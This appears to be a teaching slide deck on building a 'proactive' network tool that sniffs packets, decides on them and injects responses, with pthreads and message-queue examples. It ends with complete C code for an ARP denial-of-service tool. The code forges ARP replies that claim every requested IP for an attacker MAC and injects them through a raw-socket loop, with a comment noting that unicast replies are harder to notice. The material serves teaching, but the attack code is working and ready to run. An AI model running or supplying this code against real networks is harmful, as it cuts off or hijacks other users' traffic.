Architecture of a Proactive Security Tool

Vivek Ramachandran
What does a proactive tool do?
• The tool makes dynamic decisions at runtime based on information collected from the network.
• "Sniff – decide – Inject"
• The tool is logically divided into 3 parts:
– The sniffer logic
– The injection logic
– The decision logic
• These three communicate via some IPC mechanism, e.g. pipes, message queues, shared memory
• This is as cool as a tool can get! :D
Architecture of a Proactive Security Tool
[Diagram: Main() (1) creates the Sniffer thread and (2) creates the Injector thread. The Sniffer (3) sniffs packets from the Ethernet interface and (4) sends inputs to the decision logic ("Decide Action"); the decision logic (5) sends its output to the Injector, which (6) injects packets onto the Ethernet interface.]
Architecture of a Proactive Security Tool
1. Create sniffer thread
2. Create injector thread
3. Sniff packets from the network
4. Send inputs to the decision module
5. Send output of decision to injector
6. Inject packets
7. Goto step 3
Architecture of a Proactive Security Tool
The same seven steps, with the technique each one relies on:
• Multi-threaded programming: steps 1–2 (create the sniffer and injector threads)
• Raw sockets: steps 3 and 6 (sniff packets from the network, inject packets)
• IPC – message queues: steps 4–5 (send inputs to the decision module, send the output of the decision to the injector)
Multithreading basics
• Threads are light-weight processes
– each thread gets its own stack, so a function's local variables are private to the thread running it
– most other data is shared between threads (e.g. global variables & the heap), so concurrent access to it needs synchronisation (a mutex, or a queue)
– a thread runs concurrently with the main thread
• pthreads is the POSIX threads standard
• pthread_create() is used to create a thread
• Takes a function to execute as input
• Takes an argument (a void pointer) to pass to that function
• pthread_join() is used by the parent to wait for child threads to finish execution (and to collect their return value)
• Visit http://www.llnl.gov/computing/tutorials/pthreads/ for a comprehensive tutorial
IPC – Message Queue basics
• Message Queues are linked lists of
messages maintained by the kernel
• Processes are allowed to read and write
messages from and to a message queue if
they have requisite permissions
• Allows for an asynchronous form of
communication
• For a comprehensive yet easy to
understand tutorial visit
http://beej.us/guide/ipc/mq.html
IPC – Message Queue basics
• msgget() creates a message queue (or opens an existing one) identified by a key
• The key is normally generated with ftok() from a path and a project id; IPC_PRIVATE gives a fresh queue that needs no key
• msgsnd() sends a message into a queue
• The message must start with a positive long mtype, followed by the payload:
struct message{
long mtype; // Mandatory: first field, must be > 0
char data[1]; // payload, sized as the tool needs
…
}
• msgrcv() receives a message from the queue, optionally only messages of a given mtype
• The size passed to msgsnd()/msgrcv() covers the payload only, not the mtype field
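The seven steps of the architecture, the pthreads calls and the message-queue calls, as one program. This is an added example written for this page, not GenericTool.c or GenericTool-1.c from the slides: the main thread creates a sniffer and an injector thread (steps 1–2), the sniffer hands every frame to the decision logic as an mtype 1 message (step 4), the decision logic, which runs in the main thread, forwards the frames it wants answered to the injector as mtype 2 messages (step 5), and the injector acts on them (step 6). Reading from the network is replaced by a constructed list of frame descriptions so it runs without root or a raw socket; the queue is created with IPC_PRIVATE rather than an ftok() key, and the STOP marker, the sample frame strings and the decide() rule are this example's own choices.

```c
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MT_TO_DECIDER  1L   /* mtype: sniffer -> decision logic (step 4) */
#define MT_TO_INJECTOR 2L   /* mtype: decision logic -> injector (step 5) */
#define STOP "STOP"         /* in-band end marker so the loops can finish */
#define PAYLOAD 64

/* Queue message: 'mtype' must be the first field and be > 0. */
struct message {
    long mtype;
    char data[PAYLOAD];
};

/* Constructed stand-in for frames read off the wire (assumption, not captured). */
static const char *sample_frames[] = {
    "ARP request who-has 10.0.0.5",
    "IP tcp 10.0.0.1 -> 10.0.0.2",
    "ARP request who-has 10.0.0.9",
    "ARP reply 10.0.0.5 is-at aa:bb:cc:dd:ee:ff",
};
#define N_FRAMES (sizeof sample_frames / sizeof sample_frames[0])

struct ctx { int qid; int injected; };

static int send_msg(int qid, long mtype, const char *text) {
    struct message m;
    m.mtype = mtype;
    snprintf(m.data, sizeof m.data, "%s", text);
    return msgsnd(qid, &m, sizeof m.data, 0);   /* size covers data only */
}

/* Sniffer thread (step 3): pass every frame to the decision logic. */
static void *sniffer(void *arg) {
    struct ctx *c = arg;
    for (size_t i = 0; i < N_FRAMES; i++)
        send_msg(c->qid, MT_TO_DECIDER, sample_frames[i]);
    send_msg(c->qid, MT_TO_DECIDER, STOP);
    return NULL;
}

/* Injector thread (step 6): act on whatever the decision logic forwards. */
static void *injector(void *arg) {
    struct ctx *c = arg;
    struct message m;
    while (msgrcv(c->qid, &m, sizeof m.data, MT_TO_INJECTOR, 0) != -1) {
        if (strcmp(m.data, STOP) == 0) break;
        printf("[inject] answering: %s\n", m.data); /* raw-socket send goes here */
        c->injected++;
    }
    return NULL;
}

/* Decision logic: only ARP requests are worth answering (example rule). */
static int decide(const char *frame) {
    return strncmp(frame, "ARP request", 11) == 0;
}

/* Main thread: steps 1-2 create the threads, then it runs the decision loop
 * (steps 4-5) until the sniffer signals STOP. Returns the number of
 * injections, or -1 on error. */
int run_tool(void) {
    struct ctx c = { -1, 0 };
    pthread_t ts, ti;
    struct message m;

    c.qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);   /* private queue, no ftok() */
    if (c.qid == -1) { perror("msgget"); return -1; }
    if (pthread_create(&ts, NULL, sniffer, &c) != 0) {
        msgctl(c.qid, IPC_RMID, NULL);
        return -1;
    }
    if (pthread_create(&ti, NULL, injector, &c) != 0) {
        pthread_join(ts, NULL);
        msgctl(c.qid, IPC_RMID, NULL);
        return -1;
    }
    while (msgrcv(c.qid, &m, sizeof m.data, MT_TO_DECIDER, 0) != -1) {
        if (strcmp(m.data, STOP) == 0) break;
        if (decide(m.data)) send_msg(c.qid, MT_TO_INJECTOR, m.data);
    }
    send_msg(c.qid, MT_TO_INJECTOR, STOP);
    pthread_join(ts, NULL);
    pthread_join(ti, NULL);
    msgctl(c.qid, IPC_RMID, NULL);   /* SysV queues outlive the process: remove it */
    return c.injected;                /* safe to read: both joins have completed */
}

int main(void) {
    int n = run_tool();
    printf("injected %d replies\n", n);
    return n < 0;
}
```

Build with `cc -pthread`. Filtering on mtype is what lets one queue carry both directions of step 4 and step 5 without the sniffer ever consuming the injector's messages; the explicit msgctl(IPC_RMID) matters because a System V queue left behind by a crashed tool keeps its messages and its kernel memory until someone removes it (ipcs/ipcrm will show it).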
What tools will we make?
• GenericTool.c: A tool which articulates the architecture discussed in this ppt
• GenericTool-1.c: A modified version of the above to illustrate message transmission using message queues
• ArpDos: A tool to illustrate the working of the above architecture. It does a denial of service on the network by replying to every ARP request it sees on the network
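The decision and injection logic of ArpDos, as an added example written for this page rather than the ArpDos source the slides refer to: build_arp_reply() parses an ARP request and produces a reply that claims the requested IP for the attacker's MAC, and main() feeds it from a Linux AF_PACKET raw socket and sends each reply back out, which is the raw-socket half of the architecture the slides list but show no code for. The sample request frame, the placeholder attacker MAC 02:00:00:00:00:01 and the byte offsets are this example's own; the raw-socket loop needs root and a lab network, while build_arp_reply() runs offline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME_LEN 42   /* 14-byte Ethernet header + 28-byte ARP body */

/* Byte offsets within an Ethernet/ARP frame (IPv4 over Ethernet). */
enum {
    O_ETH_DST = 0, O_ETH_SRC = 6, O_ETH_TYPE = 12,
    O_HTYPE = 14, O_PTYPE = 16, O_HLEN = 18, O_PLEN = 19, O_OPER = 20,
    O_SHA = 22, O_SPA = 28, O_THA = 32, O_TPA = 38
};

/* Placeholder MAC the tool answers with (assumption: not a real interface). */
const uint8_t attacker_mac[6] = { 0x02, 0x00, 0x00, 0x00, 0x00, 0x01 };

/* Constructed sample: "who-has 10.0.0.5? tell 10.0.0.1" from 00:11:22:33:44:55. */
const uint8_t sample_request[FRAME_LEN] = {
    0xff,0xff,0xff,0xff,0xff,0xff,  0x00,0x11,0x22,0x33,0x44,0x55,  0x08,0x06,
    0x00,0x01,  0x08,0x00,  0x06,  0x04,  0x00,0x01,
    0x00,0x11,0x22,0x33,0x44,0x55,  10,0,0,1,
    0x00,0x00,0x00,0x00,0x00,0x00,  10,0,0,5,
};

/* Decision + crafting logic: if 'req' is an IPv4 ARP request, write a reply
 * into 'out' saying "<target IP> is-at my_mac" and return its length;
 * return -1 for anything the tool should ignore. */
int build_arp_reply(const uint8_t *req, size_t len, const uint8_t my_mac[6],
                    uint8_t out[FRAME_LEN]) {
    if (len < FRAME_LEN) return -1;
    if (req[O_ETH_TYPE] != 0x08 || req[O_ETH_TYPE + 1] != 0x06) return -1; /* not ARP */
    if (req[O_HTYPE] != 0x00 || req[O_HTYPE + 1] != 0x01) return -1;       /* not Ethernet */
    if (req[O_PTYPE] != 0x08 || req[O_PTYPE + 1] != 0x00) return -1;       /* not IPv4 */
    if (req[O_HLEN] != 6 || req[O_PLEN] != 4) return -1;
    if (req[O_OPER] != 0x00 || req[O_OPER + 1] != 0x01) return -1;         /* not a request */

    memcpy(out + O_ETH_DST, req + O_ETH_SRC, 6);   /* unicast back to the asker */
    memcpy(out + O_ETH_SRC, my_mac, 6);
    memcpy(out + O_ETH_TYPE, req + O_ETH_TYPE, 8); /* ethertype..plen copied as-is */
    out[O_OPER] = 0x00; out[O_OPER + 1] = 0x02;    /* opcode 2 = reply */
    memcpy(out + O_SHA, my_mac, 6);                /* "I am ..."                 */
    memcpy(out + O_SPA, req + O_TPA, 4);           /* "... the IP you asked for" */
    memcpy(out + O_THA, req + O_SHA, 6);
    memcpy(out + O_TPA, req + O_SPA, 4);
    return FRAME_LEN;
}

/* Self-check: is 'rep' the reply this tool would send for 'req' with 'mac'? */
int reply_matches(const uint8_t *req, const uint8_t *rep, const uint8_t mac[6]) {
    return rep[O_OPER] == 0 && rep[O_OPER + 1] == 2
        && memcmp(rep + O_ETH_DST, req + O_ETH_SRC, 6) == 0
        && memcmp(rep + O_SHA, mac, 6) == 0
        && memcmp(rep + O_SPA, req + O_TPA, 4) == 0
        && memcmp(rep + O_THA, req + O_SHA, 6) == 0
        && memcmp(rep + O_TPA, req + O_SPA, 4) == 0;
}

#ifdef __linux__
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <unistd.h>

/* Sniff-decide-inject loop on one raw socket (needs root; lab network only). */
int main(int argc, char **argv) {
    uint8_t buf[2048], reply[FRAME_LEN];
    if (argc != 2) { fprintf(stderr, "usage: %s <iface>\n", argv[0]); return 1; }
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));  /* only ARP frames arrive */
    if (fd < 0) { perror("socket"); return 1; }
    struct sockaddr_ll sll = { .sll_family = AF_PACKET,
                               .sll_protocol = htons(ETH_P_ARP),
                               .sll_ifindex = (int)if_nametoindex(argv[1]),
                               .sll_halen = 6 };
    for (;;) {
        ssize_t n = recv(fd, buf, sizeof buf, 0);                             /* sniff  */
        if (n < 0) { perror("recv"); break; }
        if (build_arp_reply(buf, (size_t)n, attacker_mac, reply) < 0) continue; /* decide */
        memcpy(sll.sll_addr, reply + O_ETH_DST, 6);
        if (sendto(fd, reply, FRAME_LEN, 0, (struct sockaddr *)&sll, sizeof sll) < 0)
            perror("sendto");                                                  /* inject */
    }
    close(fd);
    return 0;
}
#else
int main(void) { puts("raw-socket loop is Linux-only; build_arp_reply() works anywhere"); return 0; }
#endif
```

The reply is unicast to the requester's MAC rather than broadcast, which is what a legitimate responder does and what keeps the injected traffic from being obvious to every host on the segment; the checks on hlen/plen and opcode are what stop the tool from answering its own replies and looping.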
Let the games begin!!